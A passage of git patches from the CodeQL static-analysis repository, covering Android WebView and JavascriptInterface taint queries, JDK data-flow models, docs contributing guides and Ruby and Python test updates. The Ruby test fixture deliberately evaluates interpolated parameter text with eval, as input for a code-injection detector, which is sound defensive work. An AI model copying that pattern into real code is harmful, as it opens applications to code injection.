ma.getArgument(0).(CompileTimeConstantExpr).getBooleanValue() = true -select ma, - "Sensitive information may be exposed via a malicious link due to access of content:// links being permitted." diff --git a/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsContentAccess.qhelp b/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.qhelp similarity index 100% rename from java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsContentAccess.qhelp rename to java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.qhelp diff --git a/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql b/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql index 509b062c595..7ccf23cc3ae 100644 --- a/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql +++ b/java/ql/src/Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql @@ -94,7 +94,19 @@ class WebViewDisallowContentAccessConfiguration extends TaintTracking::Configura } } -from WebViewSource source -where not any(WebViewDisallowContentAccessConfiguration cfg).hasFlow(source, _) -select source, +from Expr e +where + // explicit: setAllowContentAccess(true) + exists(MethodAccess ma | + ma = e and + ma.getMethod() instanceof AllowContentAccessMethod and + ma.getArgument(0).(CompileTimeConstantExpr).getBooleanValue() = true + ) + or + // implicit: no setAllowContentAccess(false) + exists(WebViewSource source | + source.asExpr() = e and + not any(WebViewDisallowContentAccessConfiguration cfg).hasFlow(source, _) + ) +select e, "Sensitive information may be exposed via a malicious link due to access of content:// links being permitted." diff --git a/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccess.expected b/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccess.expected index dc904ca6cd7..317f847279f 100644 --- a/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccess.expected +++ b/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccess.expected @@ -1,5 +1,10 @@ | WebViewContentAccess.java:15:9:15:57 | setAllowContentAccess(...) | Sensitive information may be exposed via a malicious link due to access of content:// links being permitted. | | WebViewContentAccess.java:38:9:38:55 | setAllowContentAccess(...) | Sensitive information may be exposed via a malicious link due to access of content:// links being permitted. | +| WebViewContentAccess.java:41:25:41:49 | (...)... | Sensitive information may be exposed via a malicious link due to access of content:// links being permitted. | | WebViewContentAccess.java:43:9:43:44 | setAllowContentAccess(...) | Sensitive information may be exposed via a malicious link due to access of content:// links being permitted. | +| WebViewContentAccess.java:46:25:46:41 | new WebView(...) | Sensitive information may be exposed via a malicious link due to access of content:// links being permitted. | | WebViewContentAccess.java:48:9:48:44 | setAllowContentAccess(...) | Sensitive information may be exposed via a malicious link due to access of content:// links being permitted. | +| WebViewContentAccess.java:51:25:51:44 | getAWebView(...) | Sensitive information may be exposed via a malicious link due to access of content:// links being permitted. | | WebViewContentAccess.java:53:9:53:44 | setAllowContentAccess(...) | Sensitive information may be exposed via a malicious link due to access of content:// links being permitted. | +| WebViewContentAccess.java:55:29:55:48 | getAWebView(...) | Sensitive information may be exposed via a malicious link due to access of content:// links being permitted. | +| WebViewContentAccess.java:57:25:57:44 | getAWebView(...) | Sensitive information may be exposed via a malicious link due to access of content:// links being permitted. | diff --git a/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccess.qlref b/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccess.qlref index f907dcc5755..8ea25a487de 100644 --- a/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccess.qlref +++ b/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccess.qlref @@ -1 +1 @@ -Security/CWE/CWE-200/AndroidWebViewSettingsContentAccess.ql +Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql \ No newline at end of file diff --git a/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccessDataFlow.expected b/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccessDataFlow.expected deleted file mode 100644 index 6b0c6c52625..00000000000 --- a/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccessDataFlow.expected +++ /dev/null @@ -1,5 +0,0 @@ -| WebViewContentAccess.java:41:25:41:49 | (...)... | Sensitive information may be exposed via a malicious link due to access of content:// links being permitted. | -| WebViewContentAccess.java:46:25:46:41 | new WebView(...) | Sensitive information may be exposed via a malicious link due to access of content:// links being permitted. | -| WebViewContentAccess.java:51:25:51:44 | getAWebView(...) | Sensitive information may be exposed via a malicious link due to access of content:// links being permitted. | -| WebViewContentAccess.java:55:29:55:48 | getAWebView(...) | Sensitive information may be exposed via a malicious link due to access of content:// links being permitted. | -| WebViewContentAccess.java:57:25:57:44 | getAWebView(...) | Sensitive information may be exposed via a malicious link due to access of content:// links being permitted. | diff --git a/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccessDataFlow.qlref b/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccessDataFlow.qlref deleted file mode 100644 index 8ea25a487de..00000000000 --- a/java/ql/test/query-tests/security/CWE-200/semmle/tests/WebViewContentAccessDataFlow.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE/CWE-200/AndroidWebViewSettingsPermitsContentAccess.ql \ No newline at end of file From 81df89f93e29a28a686c4a598ac74cd4d6e0ea95 Mon Sep 17 00:00:00 2001 From: Ed Minnix Date: Tue, 3 Jan 2023 15:19:26 -0500 Subject: [PATCH 101/381] Use proper @id in changenote --- .../change-notes/2022-12-21-android-allowcontentaccess-query.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/java/ql/src/change-notes/2022-12-21-android-allowcontentaccess-query.md b/java/ql/src/change-notes/2022-12-21-android-allowcontentaccess-query.md index 008da665b57..854da87eb54 100644 --- a/java/ql/src/change-notes/2022-12-21-android-allowcontentaccess-query.md +++ b/java/ql/src/change-notes/2022-12-21-android-allowcontentaccess-query.md @@ -1,4 +1,4 @@ --- category: newQuery --- -* Added a new query `java/android/websettings-content-access` to detect Android WebViews which do not disable access to `content://` urls. +* Added a new query `java/android/websettings-permit-contentacces` to detect Android WebViews which do not disable access to `content://` urls. From f9b8200009e50d96994097bdc45cd833acd0bb1f Mon Sep 17 00:00:00 2001 From: Ed Minnix Date: Thu, 8 Dec 2022 12:44:21 -0500 Subject: [PATCH 102/381] Add stub for android.webkit.JavascriptInterface annoation --- .../android/webkit/JavascriptInterface.java | 7 +++++++ 1 file changed, 7 insertions(+) create mode 100644 java/ql/test/stubs/google-android-9.0.0/android/webkit/JavascriptInterface.java diff --git a/java/ql/test/stubs/google-android-9.0.0/android/webkit/JavascriptInterface.java b/java/ql/test/stubs/google-android-9.0.0/android/webkit/JavascriptInterface.java new file mode 100644 index 00000000000..6ef03118cdb --- /dev/null +++ b/java/ql/test/stubs/google-android-9.0.0/android/webkit/JavascriptInterface.java @@ -0,0 +1,7 @@ +package android.webkit; + +import java.lang.annotation.Annotation; + +public abstract @interface JavascriptInterface { + +} From ab7ca1d6429e9349feb48d1672fa6f67012a8153 Mon Sep 17 00:00:00 2001 From: Ed Minnix Date: Thu, 8 Dec 2022 13:53:40 -0500 Subject: [PATCH 103/381] Java: Add parameters of @JavascriptInterface methods as a remote flow sources --- .../lib/semmle/code/java/dataflow/FlowSources.qll | 13 +++++++++++++ .../semmle/code/java/frameworks/android/Android.qll | 7 +++++++ 2 files changed, 20 insertions(+) diff --git a/java/ql/lib/semmle/code/java/dataflow/FlowSources.qll b/java/ql/lib/semmle/code/java/dataflow/FlowSources.qll index 4970b8ff642..055cfb9f94e 100644 --- a/java/ql/lib/semmle/code/java/dataflow/FlowSources.qll +++ b/java/ql/lib/semmle/code/java/dataflow/FlowSources.qll @@ -298,3 +298,16 @@ class OnActivityResultIntentSource extends OnActivityResultIncomingIntent, Remot override string getSourceType() { result = "Android onActivityResult incoming Intent" } } + +/** + * A parameter of a method annotated with the `android.webkit.JavascriptInterface` method + */ +class AndroidJavascriptInterfaceMethodParameter extends RemoteFlowSource { + AndroidJavascriptInterfaceMethodParameter() { + exists(JavascriptInterfaceMethod m | this.asParameter() = m.getAParameter()) + } + + override string getSourceType() { + result = "Parameter of method with JavascriptInterface annotation" + } +} diff --git a/java/ql/lib/semmle/code/java/frameworks/android/Android.qll b/java/ql/lib/semmle/code/java/frameworks/android/Android.qll index 1a992eb5565..9e98758a523 100644 --- a/java/ql/lib/semmle/code/java/frameworks/android/Android.qll +++ b/java/ql/lib/semmle/code/java/frameworks/android/Android.qll @@ -127,3 +127,10 @@ class CreateFromParcelMethod extends Method { this.getEnclosingCallable().getDeclaringType().getAnAncestor() instanceof TypeParcelable } } + +/** + * A method annotated with the `android.webkit.JavascriptInterface` annotation. + */ +class JavascriptInterfaceMethod extends Method { + JavascriptInterfaceMethod() { this.hasAnnotation("android.webkit", "JavascriptInterface") } +} From 28f555c2b2ab09ef7362e9e095ff5e3fbad043bd Mon Sep 17 00:00:00 2001 From: Ed Minnix Date: Fri, 9 Dec 2022 11:56:08 -0500 Subject: [PATCH 104/381] Add simple test case for @JavascriptInterface parameter flow --- .../dataflow/taintsources/AndroidExposedObject.java | 11 +++++++++++ 1 file changed, 11 insertions(+) create mode 100644 java/ql/test/library-tests/dataflow/taintsources/AndroidExposedObject.java diff --git a/java/ql/test/library-tests/dataflow/taintsources/AndroidExposedObject.java b/java/ql/test/library-tests/dataflow/taintsources/AndroidExposedObject.java new file mode 100644 index 00000000000..2460781e196 --- /dev/null +++ b/java/ql/test/library-tests/dataflow/taintsources/AndroidExposedObject.java @@ -0,0 +1,11 @@ +import android.webkit.JavascriptInterface; + +public class AndroidExposedObject { + public void sink(Object o) { + } + + @JavascriptInterface + public void test(String arg) { + sink(arg); // $hasRemoteValueFlow + } +} From 0be8648a9df7fbf9415283965f241efbc6cc81ac Mon Sep 17 00:00:00 2001 From: Ed Minnix Date: Tue, 3 Jan 2023 15:55:53 -0500 Subject: [PATCH 105/381] Add changenote --- ...3-android-javascriptinterface-parameters-remote-sources.md | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 java/ql/lib/change-notes/2022-01-13-android-javascriptinterface-parameters-remote-sources.md diff --git a/java/ql/lib/change-notes/2022-01-13-android-javascriptinterface-parameters-remote-sources.md b/java/ql/lib/change-notes/2022-01-13-android-javascriptinterface-parameters-remote-sources.md new file mode 100644 index 00000000000..7915d4ea530 --- /dev/null +++ b/java/ql/lib/change-notes/2022-01-13-android-javascriptinterface-parameters-remote-sources.md @@ -0,0 +1,4 @@ +--- +category: minorAnalysis +--- +* Added an external flow source for the parameters of methods annotated with `android.webkit.JavascriptInterface`. From feaae16f7cb7056927a1cecdfce5a68e05eefbe8 Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Tue, 3 Jan 2023 16:08:14 -0500 Subject: [PATCH 106/381] Java: adjust comments --- java/ql/lib/ext/java.sql.model.yml | 2 +- java/ql/lib/ext/java.text.model.yml | 4 ++-- java/ql/lib/ext/java.time.model.yml | 2 +- java/ql/lib/ext/java.util.function.model.yml | 4 ++-- java/ql/lib/ext/java.util.model.yml | 2 +- java/ql/lib/ext/java.util.stream.model.yml | 4 ++-- 6 files changed, 9 insertions(+), 9 deletions(-) diff --git a/java/ql/lib/ext/java.sql.model.yml b/java/ql/lib/ext/java.sql.model.yml index 181d563bda9..9dd0e7d948c 100644 --- a/java/ql/lib/ext/java.sql.model.yml +++ b/java/ql/lib/ext/java.sql.model.yml @@ -28,4 +28,4 @@ extensions: pack: codeql/java-all extensible: neutralModel data: - - ["java.sql", "ResultSet", "next", "()", "manual"] # ! unsure if should be neutral model + - ["java.sql", "ResultSet", "next", "()", "manual"] diff --git a/java/ql/lib/ext/java.text.model.yml b/java/ql/lib/ext/java.text.model.yml index 2e10bd3ac39..edf2a4c7d60 100644 --- a/java/ql/lib/ext/java.text.model.yml +++ b/java/ql/lib/ext/java.text.model.yml @@ -3,5 +3,5 @@ extensions: pack: codeql/java-all extensible: neutralModel data: - - ["java.text", "DateFormat", "format", "(Date)", "manual"] # ! unsure if should be neutral model, is flow through the param interesting in this case? - - ["java.text", "SimpleDateFormat", "SimpleDateFormat", "(String)", "manual"] # ! unsure if should be neutral model, is flow through the param interesting in this case? + - ["java.text", "DateFormat", "format", "(Date)", "manual"] + - ["java.text", "SimpleDateFormat", "SimpleDateFormat", "(String)", "manual"] diff --git a/java/ql/lib/ext/java.time.model.yml b/java/ql/lib/ext/java.time.model.yml index f363058c1db..1a9b745f403 100644 --- a/java/ql/lib/ext/java.time.model.yml +++ b/java/ql/lib/ext/java.time.model.yml @@ -4,5 +4,5 @@ extensions: extensible: neutralModel data: - ["java.time", "Instant", "now", "()", "manual"] - - ["java.time", "LocalDate", "of", "(int,int,int)", "manual"] # ! unsure if should be neutral model, is flow through the param interesting in this case? + - ["java.time", "LocalDate", "of", "(int,int,int)", "manual"] - ["java.time", "ZonedDateTime", "now", "()", "manual"] diff --git a/java/ql/lib/ext/java.util.function.model.yml b/java/ql/lib/ext/java.util.function.model.yml index 8cf3a674da6..44c01b611d2 100644 --- a/java/ql/lib/ext/java.util.function.model.yml +++ b/java/ql/lib/ext/java.util.function.model.yml @@ -9,11 +9,11 @@ extensions: pack: codeql/java-all extensible: summaryModel data: - - ["java.util.function", "Function", True, "apply", "(Object)", "", "Argument[0]", "ReturnValue", "taint", "manual"] # ! unsure if should be added as a MaD model and if model is correct + - ["java.util.function", "Function", True, "apply", "(Object)", "", "Argument[0]", "ReturnValue", "taint", "manual"] - ["java.util.function", "Supplier", False, "get", "()", "", "Argument[-1]", "ReturnValue", "value", "manual"] - addsTo: pack: codeql/java-all extensible: neutralModel data: - - ["java.util.function", "Consumer", "accept", "(Object)", "manual"] # ! unsure if should be neutral model + - ["java.util.function", "Consumer", "accept", "(Object)", "manual"] diff --git a/java/ql/lib/ext/java.util.model.yml b/java/ql/lib/ext/java.util.model.yml index 9d03874f179..ec45266409a 100644 --- a/java/ql/lib/ext/java.util.model.yml +++ b/java/ql/lib/ext/java.util.model.yml @@ -369,7 +369,7 @@ extensions: - ["java.util", "Collections", "emptyList", "()", "manual"] - ["java.util", "Collections", "emptyMap", "()", "manual"] - ["java.util", "Collections", "emptySet", "()", "manual"] - - ["java.util", "Date", "Date", "(long)", "manual"] # ! unsure if should be neutral model, is flow through the param interesting in this case? + - ["java.util", "Date", "Date", "(long)", "manual"] - ["java.util", "Date", "getTime", "()", "manual"] - ["java.util", "Iterator", "hasNext", "()", "manual"] - ["java.util", "List", "clear", "()", "manual"] diff --git a/java/ql/lib/ext/java.util.stream.model.yml b/java/ql/lib/ext/java.util.stream.model.yml index 885b6e0f478..aae79ed57ac 100644 --- a/java/ql/lib/ext/java.util.stream.model.yml +++ b/java/ql/lib/ext/java.util.stream.model.yml @@ -92,7 +92,7 @@ extensions: pack: codeql/java-all extensible: neutralModel data: - - ["java.util.stream", "Collectors", "joining", "(CharSequence)", "manual"] # ! unsure if should be neutral model, is flow through the param interesting in this case? + - ["java.util.stream", "Collectors", "joining", "(CharSequence)", "manual"] - ["java.util.stream", "Collectors", "toList", "()", "manual"] - - ["java.util.stream", "Collectors", "toMap", "(Function,Function)", "manual"] # ! unsure if should be neutral model, is flow through the param interesting in this case? + - ["java.util.stream", "Collectors", "toMap", "(Function,Function)", "manual"] - ["java.util.stream", "Collectors", "toSet", "()", "manual"] From 5d92792e403d441da977e2a485e0d90d6623876f Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Tue, 3 Jan 2023 16:14:08 -0500 Subject: [PATCH 107/381] Java: update test case affected by Function.apply model --- java/ql/test/library-tests/dataflow/lambda/flow.expected | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/java/ql/test/library-tests/dataflow/lambda/flow.expected b/java/ql/test/library-tests/dataflow/lambda/flow.expected index 3b467de204b..3d3a73136ee 100644 --- a/java/ql/test/library-tests/dataflow/lambda/flow.expected +++ b/java/ql/test/library-tests/dataflow/lambda/flow.expected @@ -1,8 +1,5 @@ | Executor.java:11:15:11:22 | source(...) | Executor.java:50:39:50:45 | command | -| Executor.java:11:15:11:22 | source(...) | StringProcessor.java:23:39:23:45 | command | | Executor.java:12:15:12:22 | source(...) | Executor.java:50:39:50:45 | command | -| Executor.java:12:15:12:22 | source(...) | StringProcessor.java:23:39:23:45 | command | | Executor.java:13:15:13:22 | source(...) | Executor.java:50:39:50:45 | command | -| Executor.java:13:15:13:22 | source(...) | StringProcessor.java:23:39:23:45 | command | +| Executor.java:14:15:14:22 | source(...) | Executor.java:58:39:58:45 | command | | Executor.java:15:15:15:22 | source(...) | Executor.java:58:39:58:45 | command | -| StringProcessor.java:8:26:8:29 | args | StringProcessor.java:23:39:23:45 | command | From abe501c1af40d32eaf615326cd478f0d884f1012 Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Tue, 3 Jan 2023 17:15:50 -0500 Subject: [PATCH 108/381] Java: add change note --- .../ql/lib/change-notes/2023-01-03-add-more-top-jdk-models.md | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 java/ql/lib/change-notes/2023-01-03-add-more-top-jdk-models.md diff --git a/java/ql/lib/change-notes/2023-01-03-add-more-top-jdk-models.md b/java/ql/lib/change-notes/2023-01-03-add-more-top-jdk-models.md new file mode 100644 index 00000000000..a74fb161e58 --- /dev/null +++ b/java/ql/lib/change-notes/2023-01-03-add-more-top-jdk-models.md @@ -0,0 +1,4 @@ +--- +category: minorAnalysis +--- +* Added more dataflow models for frequently-used JDK APIs. From d859e1e9a39042b1272e80bd3b558b6659d5c228 Mon Sep 17 00:00:00 2001 From: Sarita Iyer <66540150+saritai@users.noreply.github.com> Date: Wed, 4 Jan 2023 16:43:17 -0500 Subject: [PATCH 109/381] add contributing info --- README.md | 2 ++ docs/codeql/CONTRIBUTING.MD | 9 +++++++++ docs/codeql/README.rst | 2 ++ 3 files changed, 13 insertions(+) create mode 100644 docs/codeql/CONTRIBUTING.MD diff --git a/README.md b/README.md index a1a91f8e0af..e0c34b1a6ba 100644 --- a/README.md +++ b/README.md @@ -10,6 +10,8 @@ There is [extensive documentation](https://codeql.github.com/docs/) on getting s We welcome contributions to our standard library and standard checks. Do you have an idea for a new check, or how to improve an existing query? Then please go ahead and open a pull request! Before you do, though, please take the time to read our [contributing guidelines](CONTRIBUTING.md). You can also consult our [style guides](https://github.com/github/codeql/tree/main/docs) to learn how to format your code for consistency and clarity, how to write query metadata, and how to write query help documentation for your query. +For information on contributing to CodeQL documentation, see "[the contributing guide](https://github.com/github/codeql/blob/main/docs/codeql/CONTRIBUTING.md)" for docs. + ## License The code in this repository is licensed under the [MIT License](LICENSE) by [GitHub](https://github.com). diff --git a/docs/codeql/CONTRIBUTING.MD b/docs/codeql/CONTRIBUTING.MD new file mode 100644 index 00000000000..fca621030df --- /dev/null +++ b/docs/codeql/CONTRIBUTING.MD @@ -0,0 +1,9 @@ +# Contributing to CodeQL docs + +We welcome contributions to our CodeQL docs. Want to improve existing docs or add new information you think would be helpful? Then please go ahead and open a pull request! + +**Note**: We have recently copied the CodeQL CLI documentation on [codeql.github.com](https://codeql.github.com/docs/codeql-cli/) to the public [github/docs](https://github.com/github/docs) repository so that they appear on the [GitHub Docs](https://docs.github.com/en/code-security/code-scanning) site. This includes all articles under "[Using the CodeQL CLI](https://codeql.github.com/docs/codeql-cli/using-the-codeql-cli/)" and "[CodeQL CLI reference](https://codeql.github.com/docs/codeql-cli/codeql-cli-reference/)" categories. To contribute to these docs, which are located in the [`code-security`](https://github.com/github/docs/tree/main/content/code-security/code-scanning) directory, please refer to the [CONTRIBUTING.md](https://github.com/github/docs/blob/main/CONTRIBUTING.md) file in the `docs` repository. + +## Contributing to docs on `codeql.github.com` + +To make changes to the remaining documentation on [codeql.github.com](https://codeql.github.com/docs/codeql-cli/), you can make changes to the documentation files using the GitHub UI, a codespace, or making changes locally, and then open a pull request for review. For more information about the format and structure of the CodeQL documentation on [codeql.github.com](https://codeql.github.com/docs/codeql-cli/), please see the [README](https://github.com/github/codeql/tree/main/docs/codeql#readme). diff --git a/docs/codeql/README.rst b/docs/codeql/README.rst index a07d15c27e1..1e8a55a9c24 100644 --- a/docs/codeql/README.rst +++ b/docs/codeql/README.rst @@ -12,6 +12,8 @@ see https://docutils.sourceforge.io/rst.html. For more information on Sphinx, see https://www.sphinx-doc.org. +For information on contributing to CodeQL documentation, see "[the contributing guide](/CONTRIBUTING.md)." + Project structure ***************** From a62a8d9960c27e41faf003089216b9dc74165912 Mon Sep 17 00:00:00 2001 From: Sarita Iyer <66540150+saritai@users.noreply.github.com> Date: Wed, 4 Jan 2023 16:47:34 -0500 Subject: [PATCH 110/381] Update CONTRIBUTING.MD --- docs/codeql/CONTRIBUTING.MD | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/docs/codeql/CONTRIBUTING.MD b/docs/codeql/CONTRIBUTING.MD index fca621030df..5b8c94e927c 100644 --- a/docs/codeql/CONTRIBUTING.MD +++ b/docs/codeql/CONTRIBUTING.MD @@ -2,7 +2,7 @@ We welcome contributions to our CodeQL docs. Want to improve existing docs or add new information you think would be helpful? Then please go ahead and open a pull request! -**Note**: We have recently copied the CodeQL CLI documentation on [codeql.github.com](https://codeql.github.com/docs/codeql-cli/) to the public [github/docs](https://github.com/github/docs) repository so that they appear on the [GitHub Docs](https://docs.github.com/en/code-security/code-scanning) site. This includes all articles under "[Using the CodeQL CLI](https://codeql.github.com/docs/codeql-cli/using-the-codeql-cli/)" and "[CodeQL CLI reference](https://codeql.github.com/docs/codeql-cli/codeql-cli-reference/)" categories. To contribute to these docs, which are located in the [`code-security`](https://github.com/github/docs/tree/main/content/code-security/code-scanning) directory, please refer to the [CONTRIBUTING.md](https://github.com/github/docs/blob/main/CONTRIBUTING.md) file in the `docs` repository. +**Note**: We have recently copied the CodeQL CLI documentation on [codeql.github.com](https://codeql.github.com/docs/codeql-cli/) to the public [github/docs](https://github.com/github/docs) repository so that this documentation will appear on the [GitHub Docs](https://docs.github.com/en/code-security/code-scanning) site. This includes all articles under "[Using the CodeQL CLI](https://codeql.github.com/docs/codeql-cli/using-the-codeql-cli/)" and "[CodeQL CLI reference](https://codeql.github.com/docs/codeql-cli/codeql-cli-reference/)" categories. To contribute to these docs, which are located in the [`code-security`](https://github.com/github/docs/tree/main/content/code-security/code-scanning) directory, please refer to the [CONTRIBUTING.md](https://github.com/github/docs/blob/main/CONTRIBUTING.md) file in the `docs` repository. ## Contributing to docs on `codeql.github.com` From 745d30252c54f93e365b03d7187c4e27af2966bc Mon Sep 17 00:00:00 2001 From: Sarita Iyer <66540150+saritai@users.noreply.github.com> Date: Wed, 4 Jan 2023 16:49:27 -0500 Subject: [PATCH 111/381] Update CONTRIBUTING.MD --- docs/codeql/CONTRIBUTING.MD | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/docs/codeql/CONTRIBUTING.MD b/docs/codeql/CONTRIBUTING.MD index 5b8c94e927c..0c1fe8f9532 100644 --- a/docs/codeql/CONTRIBUTING.MD +++ b/docs/codeql/CONTRIBUTING.MD @@ -2,8 +2,14 @@ We welcome contributions to our CodeQL docs. Want to improve existing docs or add new information you think would be helpful? Then please go ahead and open a pull request! -**Note**: We have recently copied the CodeQL CLI documentation on [codeql.github.com](https://codeql.github.com/docs/codeql-cli/) to the public [github/docs](https://github.com/github/docs) repository so that this documentation will appear on the [GitHub Docs](https://docs.github.com/en/code-security/code-scanning) site. This includes all articles under "[Using the CodeQL CLI](https://codeql.github.com/docs/codeql-cli/using-the-codeql-cli/)" and "[CodeQL CLI reference](https://codeql.github.com/docs/codeql-cli/codeql-cli-reference/)" categories. To contribute to these docs, which are located in the [`code-security`](https://github.com/github/docs/tree/main/content/code-security/code-scanning) directory, please refer to the [CONTRIBUTING.md](https://github.com/github/docs/blob/main/CONTRIBUTING.md) file in the `docs` repository. +## Contributing to CodeQL docs on `docs.github.com` -## Contributing to docs on `codeql.github.com` +**Note**: We have recently copied the CodeQL CLI documentation on [codeql.github.com](https://codeql.github.com/docs/codeql-cli/) to the public [github/docs](https://github.com/github/docs) repository so that this documentation will appear on the [GitHub Docs](https://docs.github.com/en/code-security/code-scanning) site. This includes all articles under "[Using the CodeQL CLI](https://codeql.github.com/docs/codeql-cli/using-the-codeql-cli/)" and "[CodeQL CLI reference](https://codeql.github.com/docs/codeql-cli/codeql-cli-reference/)" categories. + +To contribute to these docs, which are located in the [`code-scanning`](https://github.com/github/docs/tree/main/content/code-security/code-scanning) directory, please refer to the [CONTRIBUTING.md](https://github.com/github/docs/blob/main/CONTRIBUTING.md) file in the `docs` repository. + +## Contributing to CodeQL docs on `codeql.github.com` To make changes to the remaining documentation on [codeql.github.com](https://codeql.github.com/docs/codeql-cli/), you can make changes to the documentation files using the GitHub UI, a codespace, or making changes locally, and then open a pull request for review. For more information about the format and structure of the CodeQL documentation on [codeql.github.com](https://codeql.github.com/docs/codeql-cli/), please see the [README](https://github.com/github/codeql/tree/main/docs/codeql#readme). + + From d9176541c63639425155986462f91b67c7f7d083 Mon Sep 17 00:00:00 2001 From: Erik Krogh Kristensen Date: Thu, 5 Jan 2023 20:02:54 +0100 Subject: [PATCH 112/381] Apply suggestions from code review Co-authored-by: Alex Ford --- .../ruby/security/UnsafeCodeConstructionCustomizations.qll | 4 ++-- .../src/queries/security/cwe-094/UnsafeCodeConstruction.qhelp | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionCustomizations.qll b/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionCustomizations.qll index b6c9c3b5219..68c894f4705 100644 --- a/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionCustomizations.qll +++ b/ruby/ql/lib/codeql/ruby/security/UnsafeCodeConstructionCustomizations.qll @@ -81,10 +81,10 @@ module UnsafeCodeConstruction { * A string constructed from a string-literal (e.g. `"foo #{sink}"`), * where the resulting string ends up being executed as a code. */ - class StringFormatAsSink extends Sink { + class StringInterpolationAsSink extends Sink { Concepts::CodeExecution s; - StringFormatAsSink() { + StringInterpolationAsSink() { exists(Ast::StringlikeLiteral lit | any(DataFlow::Node n | n.asExpr().getExpr() = lit) = getANodeExecutedAsCode(s) and this.asExpr().getExpr() = lit.getComponent(_) diff --git a/ruby/ql/src/queries/security/cwe-094/UnsafeCodeConstruction.qhelp b/ruby/ql/src/queries/security/cwe-094/UnsafeCodeConstruction.qhelp index 6936aee149d..f6dcb452661 100644 --- a/ruby/ql/src/queries/security/cwe-094/UnsafeCodeConstruction.qhelp +++ b/ruby/ql/src/queries/security/cwe-094/UnsafeCodeConstruction.qhelp @@ -69,7 +69,7 @@ to define the getter method.

    This example dynamically registers a method on another class which -forwards its arguments to a target class. This approach uses +forwards its arguments to a target object. This approach uses module_eval and string interpolation to construct class variables and methods.

    From f98ff65b11c1c07565283c05ba4b759c10d65832 Mon Sep 17 00:00:00 2001 From: erik-krogh Date: Thu, 5 Jan 2023 20:03:51 +0100 Subject: [PATCH 113/381] use eval() instead of send() in test --- .../security/cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb index 64bba0aadc6..27dd1d81f01 100644 --- a/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb +++ b/ruby/ql/test/query-tests/security/cwe-094/UnsafeCodeConstruction/impl/unsafeCode.rb @@ -22,7 +22,7 @@ class Foobar end def named_code(code) - foo.send("def \n #{code} \n end") # OK - parameter is named code + eval("def \n #{code} \n end") # OK - parameter is named code end def joinStuff(my_arr) From d42bb119fe0519e2632c7251229b091d1d5d8215 Mon Sep 17 00:00:00 2001 From: Rasmus Lerchedahl Petersen Date: Thu, 5 Jan 2023 21:40:17 +0100 Subject: [PATCH 114/381] python: align annotations with Ruby use `result=BAD` for expected alert and `result=OK` on sinks where alerts are not wanted. --- .../dataflow/TestUtil/DataflowQueryTest.qll | 31 ++++++++++++++----- .../command_injection.py | 26 ++++++++-------- 2 files changed, 36 insertions(+), 21 deletions(-) diff --git a/python/ql/test/experimental/dataflow/TestUtil/DataflowQueryTest.qll b/python/ql/test/experimental/dataflow/TestUtil/DataflowQueryTest.qll index bb3a56160f3..0e6d6bf55bf 100644 --- a/python/ql/test/experimental/dataflow/TestUtil/DataflowQueryTest.qll +++ b/python/ql/test/experimental/dataflow/TestUtil/DataflowQueryTest.qll @@ -1,28 +1,43 @@ import python -import experimental.dataflow.TestUtil.FlowTest +import semmle.python.dataflow.new.DataFlow +import TestUtilities.InlineExpectationsTest private import semmle.python.dataflow.new.internal.PrintNode -class DataFlowQueryTest extends FlowTest { +class DataFlowQueryTest extends InlineExpectationsTest { DataFlowQueryTest() { this = "DataFlowQueryTest" } - override string flowTag() { result = "flow" } + override string getARelevantTag() { result = "result" } - override predicate relevantFlow(DataFlow::Node source, DataFlow::Node sink) { - exists(DataFlow::Configuration cfg | cfg.hasFlow(source, sink)) + override predicate hasActualResult(Location location, string element, string tag, string value) { + exists(DataFlow::Configuration cfg, DataFlow::Node fromNode, DataFlow::Node toNode | + cfg.hasFlow(fromNode, toNode) + | + location = toNode.getLocation() and + tag = "result" and + value = "BAD" and + element = toNode.toString() + ) } } query predicate missingAnnotationOnSink(Location location, string error, string element) { - error = "ERROR, you should add `# $ MISSING: flow` annotation" and + error = "ERROR, you should add `# $ MISSING: 